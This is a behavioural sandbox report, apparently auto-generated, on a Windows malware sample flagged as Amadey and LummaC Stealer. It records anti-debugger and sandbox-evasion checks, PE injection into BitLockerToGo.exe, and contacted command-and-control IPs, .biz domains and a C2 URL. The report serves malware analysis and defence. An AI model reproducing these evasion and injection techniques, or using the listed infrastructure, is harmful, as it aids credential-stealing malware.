Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.3930116087.0000000000D72000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BitLockerToGo.exe, 0000000A.00000002.2598698443.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW?.
Source: skotes.exe, 00000006.00000002.3940881565.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3940881565.00000000017E7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2598698443.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: dFVyelEPsf.exe, 00000000.00000002.1516060448.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1555808565.0000000000D72000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3930116087.0000000000D72000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: bd03a8025c.exe, 00000008.00000002.2574552217.00000000011C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\dFVyelEPsf.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Code function: 0_2_05530807 rdtsc 0_2_05530807
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00690C70 LdrInitializeThunk, 10_2_00690C70
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BC652B mov eax, dword ptr fs:[00000030h] 6_2_00BC652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BCA302 mov eax, dword ptr fs:[00000030h] 6_2_00BCA302

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 650000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 650000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 48A008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 650000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 651000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 695000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 697000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6A5000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe "C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.3930116087.0000000000D72000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: s+Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BAD3E2 cpuid 6_2_00BAD3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075542001\8dcfe9a593.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075542001\8dcfe9a593.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BACBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00BACBEA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys stealer DLL
Source: Yara match File source: 6.2.skotes.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dFVyelEPsf.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1555693067.0000000000B91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1515957867.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: 8.2.bd03a8025c.exe.9fc0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9f0a000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.BitLockerToGo.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9f70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9fc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9f0a000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2577492519.0000000009FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2577492519.0000000009F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2577492519.0000000009F0A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: 8.2.bd03a8025c.exe.9fc0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9f0a000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.BitLockerToGo.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9f70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9fc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.bd03a8025c.exe.9f0a000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2577492519.0000000009FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2577492519.0000000009F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2577492519.0000000009F0A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612329 Sample: dFVyelEPsf.exe Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 35 pleasedcfrown.biz 2->35 37 mixedrecipew.biz 2->37 39 8 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 13 other signatures 2->53 8 dFVyelEPsf.exe 5 2->8         started        12 skotes.exe 19 2->12         started        signatures3 process4 dnsIp5 23 C:\Users\user\AppData\Local\...\skotes.exe, PE32 8->23 dropped 25 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 8->25 dropped 55 Detected unpacking (changes PE section rights) 8->55 57 Tries to evade debugger and weak emulator (self modifying code) 8->57 59 Tries to detect virtualization through RDTSC time measurements 8->59 15 skotes.exe 8->15         started        43 185.215.113.43, 49707, 49709, 49710 WHOLESALECONNECTIONSNL Portugal 12->43 45 185.215.113.75, 49716, 49997, 80 WHOLESALECONNECTIONSNL Portugal 12->45 27 C:\Users\user\AppData\...\8dcfe9a593.exe, PE32 12->27 dropped 29 C:\Users\user\AppData\...\bd03a8025c.exe, PE32 12->29 dropped 31 C:\Users\user\AppData\Local\...\random[1].exe, PE32 12->31 dropped 33 C:\Users\user\AppData\Local\...\random[1].exe, PE32 12->33 dropped 61 Hides threads from debuggers 12->61 63 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->63 65 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->65 18 bd03a8025c.exe 12->18         started        file6 signatures7 process8 signatures9 67 Antivirus detection for dropped file 15->67 69 Multi AV Scanner detection for dropped file 15->69 71 Detected unpacking (changes PE section rights) 15->71 79 6 other signatures 15->79 73 Writes to foreign memory regions 18->73 75 Allocates memory in foreign processes 18->75 77 Injects a PE file into a foreign processes 18->77 20 BitLockerToGo.exe 18->20         started        process10 dnsIp11 41 steamcommunity.com 104.102.49.254, 443, 49943 AKAMAI-ASUS United States 20->41
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.75
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS false

Contacted Domains

Name IP Active
steamcommunity.com 104.102.49.254 true
edcatiofireeu.shop unknown unknown
lightdeerysua.biz unknown unknown
affordtempyo.biz unknown unknown
pleasedcfrown.biz unknown unknown
impolitewearr.biz unknown unknown
mixedrecipew.biz unknown unknown
toppyneedus.biz unknown unknown
suggestyuoz.biz unknown unknown
hoursuhouy.biz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
suggestyuoz.biz true
  • Avira URL Cloud: malware
 unknown
pleasedcfrown.biz true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.43/Zu7JuNko/index.php false
    		high
    impolitewearr.biz true
    • Avira URL Cloud: malware
    		 unknown
    hoursuhouy.biz true
    • Avira URL Cloud: malware
    		 unknown
    https://steamcommunity.com/profiles/76561199724331900 false
      		high
      toppyneedus.biz false
        		high
        lightdeerysua.biz true
        • Avira URL Cloud: malware
        		 unknown
        edcatiofireeu.shop true
        • Avira URL Cloud: malware
        		 unknown
        affordtempyo.biz true
        • Avira URL Cloud: malware
        		 unknown